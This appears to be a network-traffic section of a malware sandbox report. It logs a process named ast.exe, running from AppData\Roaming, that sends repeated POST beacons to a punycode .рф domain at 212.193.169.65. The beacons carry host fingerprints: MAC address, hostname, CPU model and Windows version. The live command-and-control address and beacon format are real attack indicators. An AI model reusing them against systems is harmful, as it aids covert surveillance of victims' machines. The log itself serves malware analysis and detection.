2024-11-19 18:15:15 UTC | 134 | OUT | POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
Host: id.xn--80akicokc0aablc.xn--p1ai:443
Content-Length: 269
2024-11-19 18:15:15 UTC | 269 | OUT | Data Raw: 01 31 00 00 0d 01 00 00 00 00 00 00 bf 00 00 00 4d 02 63 43 2d 46 34 2d 42 42 2d 35 37 2d 30 44 2d 43 39 01 03 48 53 02 35 33 36 38 37 30 39 31 32 30 30 03 48 56 02 76 73 71 6c 68 74 64 76 75 6e 6b 69 03 48 4e 02 36 5a 4b 45 45 4d 56 44 03 43 50 02 30 30 30 38 2d 30 36 46 38 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 20 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 03 48 4e 30 02 30 36 30 30 32 63 32 39 36 62 38 35 39 37 66 66 37 34 61 37 61 36 36 66 34 30 31 31 66 33 38 35 03 48 53 30 02 35 33 36 38 37 30 39 31 32 30 30 03 36 00 00 00 34 2e 35 2d 33 30 32 34 39 34 01 30 2f 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 28 31 30 2e 30 2e
Data Ascii: 1McC-F4-BB-57-0D-C9HS53687091200HVvsqlhtdvunkiHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-3024940/Microsoft Windows 10 Pro (10.0.


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.5 | 49988 | 212.193.169.65 | 443 | 3380 | C:\Users\user\AppData\Roaming\fat\ast.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-19 18:15:16 UTC | 134 | OUT | POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
Host: id.xn--80akicokc0aablc.xn--p1ai:443
Content-Length: 269
2024-11-19 18:15:16 UTC | 269 | OUT | Data Raw: 01 31 00 00 0d 01 00 00 00 00 00 00 bf 00 00 00 4d 02 63 43 2d 46 34 2d 42 42 2d 35 37 2d 30 44 2d 43 39 01 03 48 53 02 35 33 36 38 37 30 39 31 32 30 30 03 48 56 02 76 73 71 6c 68 74 64 76 75 6e 6b 69 03 48 4e 02 36 5a 4b 45 45 4d 56 44 03 43 50 02 30 30 30 38 2d 30 36 46 38 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 20 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 03 48 4e 30 02 30 36 30 30 32 63 32 39 36 62 38 35 39 37 66 66 37 34 61 37 61 36 36 66 34 30 31 31 66 33 38 35 03 48 53 30 02 35 33 36 38 37 30 39 31 32 30 30 03 36 00 00 00 34 2e 35 2d 33 30 32 34 39 34 01 30 2f 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 28 31 30 2e 30 2e
Data Ascii: 1McC-F4-BB-57-0D-C9HS53687091200HVvsqlhtdvunkiHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-3024940/Microsoft Windows 10 Pro (10.0.


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.5 | 49991 | 212.193.169.65 | 443 | 3380 | C:\Users\user\AppData\Roaming\fat\ast.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-19 18:15:17 UTC | 134 | OUT | POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
Host: id.xn--80akicokc0aablc.xn--p1ai:443
Content-Length: 269
2024-11-19 18:15:17 UTC | 269 | OUT | Data Raw: 01 31 00 00 0d 01 00 00 00 00 00 00 bf 00 00 00 4d 02 63 43 2d 46 34 2d 42 42 2d 35 37 2d 30 44 2d 43 39 01 03 48 53 02 35 33 36 38 37 30 39 31 32 30 30 03 48 56 02 76 73 71 6c 68 74 64 76 75 6e 6b 69 03 48 4e 02 36 5a 4b 45 45 4d 56 44 03 43 50 02 30 30 30 38 2d 30 36 46 38 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 20 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 03 48 4e 30 02 30 36 30 30 32 63 32 39 36 62 38 35 39 37 66 66 37 34 61 37 61 36 36 66 34 30 31 31 66 33 38 35 03 48 53 30 02 35 33 36 38 37 30 39 31 32 30 30 03 36 00 00 00 34 2e 35 2d 33 30 32 34 39 34 01 30 2f 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 28 31 30 2e 30 2e
Data Ascii: 1McC-F4-BB-57-0D-C9HS53687091200HVvsqlhtdvunkiHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-3024940/Microsoft Windows 10 Pro (10.0.


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.5 | 49994 | 212.193.169.65 | 443 | 3380 | C:\Users\user\AppData\Roaming\fat\ast.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-19 18:15:18 UTC | 134 | OUT | POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
Host: id.xn--80akicokc0aablc.xn--p1ai:443
Content-Length: 269
2024-11-19 18:15:18 UTC | 269 | OUT | Data Raw: 01 31 00 00 0d 01 00 00 00 00 00 00 bf 00 00 00 4d 02 63 43 2d 46 34 2d 42 42 2d 35 37 2d 30 44 2d 43 39 01 03 48 53 02 35 33 36 38 37 30 39 31 32 30 30 03 48 56 02 76 73 71 6c 68 74 64 76 75 6e 6b 69 03 48 4e 02 36 5a 4b 45 45 4d 56 44 03 43 50 02 30 30 30 38 2d 30 36 46 38 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 20 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 03 48 4e 30 02 30 36 30 30 32 63 32 39 36 62 38 35 39 37 66 66 37 34 61 37 61 36 36 66 34 30 31 31 66 33 38 35 03 48 53 30 02 35 33 36 38 37 30 39 31 32 30 30 03 36 00 00 00 34 2e 35 2d 33 30 32 34 39 34 01 30 2f 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 28 31 30 2e 30 2e
Data Ascii: 1McC-F4-BB-57-0D-C9HS53687091200HVvsqlhtdvunkiHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-3024940/Microsoft Windows 10 Pro (10.0.


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.5 | 49997 | 212.193.169.65 | 443 | 3380 | C:\Users\user\AppData\Roaming\fat\ast.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-19 18:15:19 UTC | 134 | OUT | POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
Host: id.xn--80akicokc0aablc.xn--p1ai:443
Content-Length: 269
2024-11-19 18:15:19 UTC | 269 | OUT | Data Raw: 01 31 00 00 0d 01 00 00 00 00 00 00 bf 00 00 00 4d 02 63 43 2d 46 34 2d 42 42 2d 35 37 2d 30 44 2d 43 39 01 03 48 53 02 35 33 36 38 37 30 39 31 32 30 30 03 48 56 02 76 73 71 6c 68 74 64 76 75 6e 6b 69 03 48 4e 02 36 5a 4b 45 45 4d 56 44 03 43 50 02 30 30 30 38 2d 30 36 46 38 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 20 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 03 48 4e 30 02 30 36 30 30 32 63 32 39 36 62 38 35 39 37 66 66 37 34 61 37 61 36 36 66 34 30 31 31 66 33 38 35 03 48 53 30 02 35 33 36 38 37 30 39 31 32 30 30 03 36 00 00 00 34 2e 35 2d 33 30 32 34 39 34 01 30 2f 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 28 31 30 2e 30 2e
Data Ascii: 1McC-F4-BB-57-0D-C9HS53687091200HVvsqlhtdvunkiHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-3024940/Microsoft Windows 10 Pro (10.0.


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.5 | 50000 | 212.193.169.65 | 443 | 3380 | C:\Users\user\AppData\Roaming\fat\ast.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-19 18:15:19 UTC | 134 | OUT | POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
Host: id.xn--80akicokc0aablc.xn--p1ai:443
Content-Length: 269
2024-11-19 18:15:19 UTC | 269 | OUT | Data Raw: 01 31 00 00 0d 01 00 00 00 00 00 00 bf 00 00 00 4d 02 63 43 2d 46 34 2d 42 42 2d 35 37 2d 30 44 2d 43 39 01 03 48 53 02 35 33 36 38 37 30 39 31 32 30 30 03 48 56 02 76 73 71 6c 68 74 64 76 75 6e 6b 69 03 48 4e 02 36 5a 4b 45 45 4d 56 44 03 43 50 02 30 30 30 38 2d 30 36 46 38 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 20 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 03 48 4e 30 02 30 36 30 30 32 63 32 39 36 62 38 35 39 37 66 66 37 34 61 37 61 36 36 66 34 30 31 31 66 33 38 35 03 48 53 30 02 35 33 36 38 37 30 39 31 32 30 30 03 36 00 00 00 34 2e 35 2d 33 30 32 34 39 34 01 30 2f 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 28 31 30 2e 30 2e
Data Ascii: 1McC-F4-BB-57-0D-C9HS53687091200HVvsqlhtdvunkiHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-3024940/Microsoft Windows 10 Pro (10.0.


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.5 | 50003 | 212.193.169.65 | 443 | 3380 | C:\Users\user\AppData\Roaming\fat\ast.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-19 18:15:20 UTC | 134 | OUT | POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
Host: id.xn--80akicokc0aablc.xn--p1ai:443
Content-Length: 269
2024-11-19 18:15:20 UTC | 269 | OUT | Data Raw: 01 31 00 00 0d 01 00 00 00 00 00 00 bf 00 00 00 4d 02 63 43 2d 46 34 2d 42 42 2d 35 37 2d 30 44 2d 43 39 01 03 48 53 02 35 33 36 38 37 30 39 31 32 30 30 03 48 56 02 76 73 71 6c 68 74 64 76 75 6e 6b 69 03 48 4e 02 36 5a 4b 45 45 4d 56 44 03 43 50 02 30 30 30 38 2d 30 36 46 38 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 20 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 03 48 4e 30 02 30 36 30 30 32 63 32 39 36 62 38 35 39 37 66 66 37 34 61 37 61 36 36 66 34 30 31 31 66 33 38 35 03 48 53 30 02 35 33 36 38 37 30 39 31 32 30 30 03 36 00 00 00 34 2e 35 2d 33 30 32 34 39 34 01 30 2f 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 28 31 30 2e 30 2e
Data Ascii: 1McC-F4-BB-57-0D-C9HS53687091200HVvsqlhtdvunkiHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-3024940/Microsoft Windows 10 Pro (10.0.


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.5 | 50006 | 212.193.169.65 | 443 | 3380 | C:\Users\user\AppData\Roaming\fat\ast.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-19 18:15:21 UTC | 134 | OUT | POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
Host: id.xn--80akicokc0aablc.xn--p1ai:443
Content-Length: 269
2024-11-19 18:15:21 UTC | 269 | OUT | Data Raw: 01 31 00 00 0d 01 00 00 00 00 00 00 bf 00 00 00 4d 02 63 43 2d 46 34 2d 42 42 2d 35 37 2d 30 44 2d 43 39 01 03 48 53 02 35 33 36 38 37 30 39 31 32 30 30 03 48 56 02 76 73 71 6c 68 74 64 76 75 6e 6b 69 03 48 4e 02 36 5a 4b 45 45 4d 56 44 03 43 50 02 30 30 30 38 2d 30 36 46 38 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 20 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 03 48 4e 30 02 30 36 30 30 32 63 32 39 36 62 38 35 39 37 66 66 37 34 61 37 61 36 36 66 34 30 31 31 66 33 38 35 03 48 53 30 02 35 33 36 38 37 30 39 31 32 30 30 03 36 00 00 00 34 2e 35 2d 33 30 32 34 39 34 01 30 2f 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 28 31 30 2e 30 2e
Data Ascii: 1McC-F4-BB-57-0D-C9HS53687091200HVvsqlhtdvunkiHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-3024940/Microsoft Windows 10 Pro (10.0.


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.5 | 50009 | 212.193.169.65 | 443 | 3380 | C:\Users\user\AppData\Roaming\fat\ast.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-19 18:15:22 UTC | 134 | OUT | POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
Host: id.xn--80akicokc0aablc.xn--p1ai:443
Content-Length: 269
2024-11-19 18:15:22 UTC | 269 | OUT | Data Raw: 01 31 00 00 0d 01 00 00 00 00 00 00 bf 00 00 00 4d 02 63 43 2d 46 34 2d 42 42 2d 35 37 2d 30 44 2d 43 39 01 03 48 53 02 35 33 36 38 37 30 39 31 32 30 30 03 48 56 02 76 73 71 6c 68 74 64 76 75 6e 6b 69 03 48 4e 02 36 5a 4b 45 45 4d 56 44 03 43 50 02 30 30 30 38 2d 30 36 46 38 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 20 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 03 48 4e 30 02 30 36 30 30 32 63 32 39 36 62 38 35 39 37 66 66 37 34 61 37 61 36 36 66 34 30 31 31 66 33 38 35 03 48 53 30 02 35 33 36 38 37 30 39 31 32 30 30 03 36 00 00 00 34 2e 35 2d 33 30 32 34 39 34 01 30 2f 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 28 31 30 2e 30 2e
Data Ascii: 1McC-F4-BB-57-0D-C9HS53687091200HVvsqlhtdvunkiHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-3024940/Microsoft Windows 10 Pro (10.0.


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.5 | 50012 | 212.193.169.65 | 443 | 3380 | C:\Users\user\AppData\Roaming\fat\ast.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-19 18:15:23 UTC | 134 | OUT | POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
Host: id.xn--80akicokc0aablc.xn--p1ai:443
Content-Length: 269
2024-11-19 18:15:23 UTC | 269 | OUT | Data Raw: 01 31 00 00 0d 01 00 00 00 00 00 00 bf 00 00 00 4d 02 63 43 2d 46 34 2d 42 42 2d 35 37 2d 30 44 2d 43 39 01 03 48 53 02 35 33 36 38 37 30 39 31 32 30 30 03 48 56 02 76 73 71 6c 68 74 64 76 75 6e 6b 69 03 48 4e 02 36 5a 4b 45 45 4d 56 44 03 43 50 02 30 30 30 38 2d 30 36 46 38 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 20 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 03 48 4e 30 02 30 36 30 30 32 63 32 39 36 62 38 35 39 37 66 66 37 34 61 37 61 36 36 66 34 30 31 31 66 33 38 35 03 48 53 30 02 35 33 36 38 37 30 39 31 32 30 30 03 36 00 00 00 34 2e 35 2d 33 30 32 34 39 34 01 30 2f 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 28 31 30 2e 30 2e
Data Ascii: 1McC-F4-BB-57-0D-C9HS53687091200HVvsqlhtdvunkiHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-3024940/Microsoft Windows 10 Pro (10.0.


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.5 | 50021 | 212.193.169.65 | 443 | 3380 | C:\Users\user\AppData\Roaming\fat\ast.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-19 18:15:26 UTC | 134 | OUT | POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
Host: id.xn--80akicokc0aablc.xn--p1ai:443
Content-Length: 269
2024-11-19 18:15:26 UTC | 269 | OUT | Data Raw: 01 31 00 00 0d 01 00 00 00 00 00 00 bf 00 00 00 4d 02 63 43 2d 46 34 2d 42 42 2d 35 37 2d 30 44 2d 43 39 01 03 48 53 02 35 33 36 38 37 30 39 31 32 30 30 03 48 56 02 76 73 71 6c 68 74 64 76 75 6e 6b 69 03 48 4e 02 36 5a 4b 45 45 4d 56 44 03 43 50 02 30 30 30 38 2d 30 36 46 38 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 20 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 03 48 4e 30 02 30 36 30 30 32 63 32 39 36 62 38 35 39 37 66 66 37 34 61 37 61 36 36 66 34 30 31 31 66 33 38 35 03 48 53 30 02 35 33 36 38 37 30 39 31 32 30 30 03 36 00 00 00 34 2e 35 2d 33 30 32 34 39 34 01 30 2f 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 28 31 30 2e 30 2e
Data Ascii: 1McC-F4-BB-57-0D-C9HS53687091200HVvsqlhtdvunkiHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-3024940/Microsoft Windows 10 Pro (10.0.


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
12          192.168.2.5  50024        212.193.169.65  443               3380  C:\Users\user\AppData\Roaming\fat\ast.exe

Timestamp                Bytes transferred  Direction  Data
2024-11-19 18:15:26 UTC  134                OUT        POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
                                                       Host: id.xn--80akicokc0aablc.xn--p1ai:443
                                                       Content-Length: 269
2024-11-19 18:15:26 UTC  269                OUT        Data Ascii: 1McC-F4-BB-57-0D-C9HS53687091200HVvsqlhtdvunkiHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-3024940/Microsoft Windows 10 Pro (10.0.


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
13          192.168.2.5  50027        212.193.169.65  443               3380  C:\Users\user\AppData\Roaming\fat\ast.exe

Timestamp                Bytes transferred  Direction  Data
2024-11-19 18:15:27 UTC  134                OUT        POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
                                                       Host: id.xn--80akicokc0aablc.xn--p1ai:443
                                                       Content-Length: 269
2024-11-19 18:15:27 UTC  269                OUT        Data Ascii: 1McC-F4-BB-57-0D-C9HS53687091200HVvsqlhtdvunkiHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-3024940/Microsoft Windows 10 Pro (10.0.


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
14          192.168.2.5  50030        212.193.169.65  443               3380  C:\Users\user\AppData\Roaming\fat\ast.exe

Timestamp                Bytes transferred  Direction  Data
2024-11-19 18:15:28 UTC  134                OUT        POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
                                                       Host: id.xn--80akicokc0aablc.xn--p1ai:443
                                                       Content-Length: 269
2024-11-19 18:15:28 UTC  269                OUT        Data Ascii: 1McC-F4-BB-57-0D-C9HS53687091200HVvsqlhtdvunkiHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-3024940/Microsoft Windows 10 Pro (10.0.


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
15          192.168.2.5  50033        212.193.169.65  443               3380  C:\Users\user\AppData\Roaming\fat\ast.exe

Timestamp                Bytes transferred  Direction  Data
2024-11-19 18:15:29 UTC  134                OUT        POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
                                                       Host: id.xn--80akicokc0aablc.xn--p1ai:443
                                                       Content-Length: 269
2024-11-19 18:15:29 UTC  269                OUT        Data Ascii: 1McC-F4-BB-57-0D-C9HS53687091200HVvsqlhtdvunkiHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-3024940/Microsoft Windows 10 Pro (10.0.


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
16          192.168.2.5  50036        212.193.169.65  443               3380  C:\Users\user\AppData\Roaming\fat\ast.exe

Timestamp                Bytes transferred  Direction  Data
2024-11-19 18:15:30 UTC  134                OUT        POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
                                                       Host: id.xn--80akicokc0aablc.xn--p1ai:443
                                                       Content-Length: 269
2024-11-19 18:15:30 UTC  269                OUT        Data Ascii: 1McC-F4-BB-57-0D-C9HS53687091200HVvsqlhtdvunkiHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-3024940/Microsoft Windows 10 Pro (10.0.


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
17          192.168.2.5  50039        212.193.169.65  443               3380  C:\Users\user\AppData\Roaming\fat\ast.exe

Timestamp                Bytes transferred  Direction  Data
2024-11-19 18:15:31 UTC  134                OUT        POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
                                                       Host: id.xn--80akicokc0aablc.xn--p1ai:443
                                                       Content-Length: 269
2024-11-19 18:15:31 UTC  269                OUT        Data Ascii: 1McC-F4-BB-57-0D-C9HS53687091200HVvsqlhtdvunkiHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-3024940/Microsoft Windows 10 Pro (10.0.


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
18          192.168.2.5  50042        212.193.169.65  443               3380  C:\Users\user\AppData\Roaming\fat\ast.exe

Timestamp                Bytes transferred  Direction  Data
2024-11-19 18:15:32 UTC  134                OUT        POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
                                                       Host: id.xn--80akicokc0aablc.xn--p1ai:443
                                                       Content-Length: 269
2024-11-19 18:15:32 UTC  269                OUT        Data Ascii: 1McC-F4-BB-57-0D-C9HS53687091200HVvsqlhtdvunkiHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-3024940/Microsoft Windows 10 Pro (10.0.


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
19          192.168.2.5  50045        212.193.169.65  443               3380  C:\Users\user\AppData\Roaming\fat\ast.exe

Timestamp                Bytes transferred  Direction  Data
2024-11-19 18:15:32 UTC  134                OUT        POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
                                                       Host: id.xn--80akicokc0aablc.xn--p1ai:443
                                                       Content-Length: 269
2024-11-19 18:15:32 UTC  269                OUT        Data Ascii: 1McC-F4-BB-57-0D-C9HS53687091200HVvsqlhtdvunkiHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-3024940/Microsoft Windows 10 Pro (10.0.


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
20          192.168.2.5  50048        212.193.169.65  443               3380  C:\Users\user\AppData\Roaming\fat\ast.exe

Timestamp                Bytes transferred  Direction  Data
2024-11-19 18:15:33 UTC  134                OUT        POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
                                                       Host: id.xn--80akicokc0aablc.xn--p1ai:443
                                                       Content-Length: 269
2024-11-19 18:15:33 UTC  269                OUT        Data Ascii: 1McC-F4-BB-57-0D-C9HS53687091200HVvsqlhtdvunkiHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-3024940/Microsoft Windows 10 Pro (10.0.


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
21          192.168.2.5  50051        212.193.169.65  443               3380  C:\Users\user\AppData\Roaming\fat\ast.exe

Timestamp                Bytes transferred  Direction  Data
2024-11-19 18:15:35 UTC  134                OUT        POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
                                                       Host: id.xn--80akicokc0aablc.xn--p1ai:443
                                                       Content-Length: 269
2024-11-19 18:15:35 UTC  269                OUT        Data Ascii: 1McC-F4-BB-57-0D-C9HS53687091200HVvsqlhtdvunkiHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-3024940/Microsoft Windows 10 Pro (10.0.


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
22          192.168.2.5  50054        212.193.169.65  443               3380  C:\Users\user\AppData\Roaming\fat\ast.exe

Timestamp                Bytes transferred  Direction  Data
2024-11-19 18:15:35 UTC  134                OUT        POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
                                                       Host: id.xn--80akicokc0aablc.xn--p1ai:443
                                                       Content-Length: 269
2024-11-19 18:15:35 UTC  269                OUT        Data Ascii: 1McC-F4-BB-57-0D-C9HS53687091200HVvsqlhtdvunkiHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-3024940/Microsoft Windows 10 Pro (10.0.


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
